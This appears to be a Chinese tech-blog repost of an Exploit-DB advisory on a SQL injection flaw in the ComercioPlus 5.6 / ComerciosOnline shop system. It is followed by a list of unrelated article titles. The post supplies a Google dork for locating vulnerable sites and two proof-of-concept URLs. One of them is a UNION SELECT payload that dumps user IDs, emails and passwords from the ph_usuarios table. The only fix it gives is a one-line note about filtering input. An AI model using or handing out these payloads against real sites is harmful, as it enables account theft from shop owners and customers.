ComercioPlus 5.6 SQL注入漏洞
来源:互联网 发布:淘宝女职业装 编辑:程序博客网 时间:2024/06/03 21:09
ComercioPlus是一款使用PHP编写的虚拟商店系统,ComercioPlus 5.6版中的pp_productos.php文件存在 SQL注入漏洞,可能导致敏感信息泄露。 [+]info:
~~~~~~~~~
# Exploit Title: Comerciosonline CMS SQLi
# Google Dork: allintext: " Servicio ofrecido por ComerciosOnLine "
# Date: 27/01/2011
# Author: Daniel Godoy
# Author Mail: DanielGodoy[at]GobiernoFederal[dot]com
# Author Web:
www.delincuentedigital.com.ar
# Software Link:
http://www.comerciosonline.com/index.php?p=8
# Version: All
# Tested on: Linux, Windows
[+]poc:
~~~~~~~~~
http://localhost/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT+1,2,3,4,5--
http://localhost/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT+1,2,3,4,concat_ws(0x3a,codigousuario,email,password)+from+ph_usuarios--
[+]Reference:
~~~~~~~~~
http://www.exploit-db.com/exploits/16060
修复:pp_productos.php进行过滤
- ComercioPlus 5.6 SQL注入漏洞
- Sql 注入漏洞,注意
- SQL注入漏洞
- sql注入漏洞原理
- SQL 注入漏洞新动向
- SQL注入漏洞接触
- SQL注入漏洞
- 防范SQL注入漏洞
- Sql 注入漏洞
- 防止SQL注入漏洞
- SQL注入漏洞攻击
- Sql 注入漏洞攻击
- sql注入漏洞攻击
- SQL注入漏洞
- SQL注入漏洞攻击
- sql注入漏洞攻击
- Sql注入漏洞攻击
- SQL漏洞注入实例
- 【转】再次写给我们这些浮躁的程序员
- 成功源于自信!相信自己。下边每个字都是价值不菲,你认真看了吗?
- AD灾难恢复
- 双卡 双待 双模 智能机
- 存储过程 以列名为参数
- ComercioPlus 5.6 SQL注入漏洞
- 某酒业网会员注册上传漏洞
- ld cannot find -lbz2
- BeeSns微博系统V0.2提升权限oday+exp
- 思科交换机配置命令
- 思科路由器配置命令
- VMware for Linux Install(2.6.35 kernel)失败的问题
- 【zz】Function List
- cobertura-1.9.4.1与Ant一起使用